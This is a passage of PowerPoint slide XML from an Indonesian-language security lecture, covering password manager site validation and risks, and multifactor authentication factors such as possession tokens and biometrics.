            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelajahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digitalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peniruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelabui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20433651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Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Multifaktor</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Desain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Rahasia kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikompromikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggantikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>multifaktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (MFA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Faktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Miliki</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>miliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh orang lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, key fob, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Faktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang Anda Adalah</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Faktor "Something You Are" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Faktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisiologis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sidik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
